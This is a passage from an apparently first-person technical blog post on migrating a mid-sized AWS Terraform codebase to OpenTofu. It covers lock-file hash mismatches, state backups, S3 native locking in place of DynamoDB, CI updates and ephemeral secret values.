It almost worked. Until I checked where providers were being pulled from.

OpenTofu fetches providers from registry.opentofu.org, not registry.terraform.io. The registries mirror each other for HashiCorp providers, but your existing .terraform.lock.hcl was generated against Terraform's registry. The provider hashes don't match.

Error: Failed to install provider

To install this provider, OpenTofu needs to verify that the checksums in
.terraform.lock.hcl match the provider packages downloaded from the registry.
The following packages are required but the checksums don't match:
  registry.opentofu.org/hashicorp/aws v5.82.0

I also ran into teammates who still had the old Terraform-generated lock files. Some ran tofu plan on their local branches and got hash mismatches in the other direction. The lesson: this has to be a coordinated team migration, not a quiet swap on your own laptop.

The Solution

The codebase: a mid-sized AWS platform for a SaaS client. Around 8,000 lines of Terraform across 12 modules. Standard providers: aws, kubernetes, helm, random, tls. S3 backend for state, one workspace per environment. CI via GitHub Actions. No Terraform Cloud, no HCP.

Step 1: Back up everything

Before touching anything, tag the current state in git and pull a snapshot of your state file:

git tag pre-opentofu-migration

terraform state pull > terraform.tfstate.backup-$(date +%Y%m%d)

If you're on S3, enable versioning before you start. You want a timestamped rollback point. Non-negotiable.

Step 2: Install tofu alongside terraform

The two binaries coexist without conflict:

brew install opentofu
tofu --version
# OpenTofu v1.11.4
# on darwin_arm64

Keep terraform installed until you're confident the migration is complete.

Step 3: Delete the lock file and re-init

rm .terraform.lock.hcl
tofu init

tofu init regenerates the lock file with hashes for both registry.opentofu.org and registry.terraform.io providers, signed by OpenTofu's key infrastructure. Commit the new lock file and announce to your team to re-run tofu init on their local copies.

Once you commit the new lock file, treat the repo as an OpenTofu project. Don't run terraform init on the same directory afterward. The two binaries will fight over hashes.

Step 4: Check your `terraform {}` block

You don't have to rename it. OpenTofu still accepts the terraform {} block. Your existing HCL works without modification.

# This works fine in OpenTofu, no changes needed
terraform {
  required_version = ">= 1.5.0"

  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
  }

  backend "s3" {
    bucket         = "my-terraform-state"
    key            = "production/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-state-locks"
  }
}

You can leave it as terraform {} or rename it to tofu {}. Both work.

Step 5: Verify with `tofu plan`

tofu plan -out=migration-test.tfplan

Expected result: no changes. If you see changes, do not apply. Investigate first. It usually means a provider version difference or a schema update.

I got zero changes across all three environments.

Step 6: Drop DynamoDB for S3 native locking

This is where OpenTofu pulls ahead. OpenTofu 1.10.0 added native conditional writes for S3 state locking. No DynamoDB table required.

Before:

backend "s3" {
  bucket         = "my-state-bucket"
  key            = "prod/terraform.tfstate"
  region         = "us-east-1"
  encrypt        = true
  dynamodb_table = "terraform-locks"
}

After:

backend "s3" {
  bucket       = "my-state-bucket"
  key          = "prod/terraform.tfstate"
  region       = "us-east-1"
  encrypt      = true
  use_lockfile = true
}

Fewer moving parts. One less AWS service to manage. Simpler IAM permissions.

Step 7: Update your CI pipeline

Every place your pipeline runs terraform, you need tofu. In GitHub Actions:

Before:

- uses: hashicorp/setup-terraform@v3
  with:
    terraform_version: "1.9.5"

After:

- uses: opentofu/setup-opentofu@v1
  with:
    tofu_version: "1.11.4"

The opentofu/setup-opentofu action is the official GitHub Action. Clean swap.

Results

Metric	Before	After
State locking dependencies	S3 + DynamoDB	S3 only
DynamoDB tables	3 (one per environment)	0
Migration time	N/A	4 hours (including CI updates)
Plan output differences	N/A	None
Sensitive values in state	Persisted	Ephemeral (with 1.11 features)

The operational simplicity of dropping DynamoDB is hard to quantify in a table. It's one less service in IAM policies, one less resource to manage in the state backend module, one less thing that can drift or get misconfigured.

Lessons Learned

Coordinate the lock file migration as a team. If half your team is still running terraform init, you'll get hash conflicts. Announce the cutover date, have everyone delete and regenerate their lock files on the same day.
Pin your OpenTofu version in CI. The 1.11.x patch cycle had a notable regression in 1.11.0 that was fixed in 1.11.2. The team moves fast. Pin to a specific minor version in CI and upgrade deliberately.
The terraform {} block is fine. Don't waste time renaming it. The binary changed; the HCL didn't.
The point of no return is tofu apply. After you run apply, the state metadata reflects OpenTofu's version. You can still read the state with Terraform, but you'll get warnings. Decide before you apply whether you're committed.
Ephemeral values are worth understanding. OpenTofu 1.11.0 introduced ephemeral resources and write-only attributes. Sensitive credentials can be used without ever landing in state. If you've been papering over this with Vault workarounds, it's worth reading the docs before you finish the migration.

ephemeral "aws_secretsmanager_secret_version" "db_password" {
  secret_id = aws_secretsmanager_secret.db.id
}

resource "kubernetes_secret_v1" "db_credentials" {
  metadata {
    name      = "db-credentials"
    namespace = "app"
  }

  data_wo = {
    password = ephemeral.aws_secretsmanager_secret_version.db_password.secret_string
  }

  data_wo_revision = 1
}

Try It Yourself

OpenTofu Migration Guide: opentofu.org/docs/intro/migration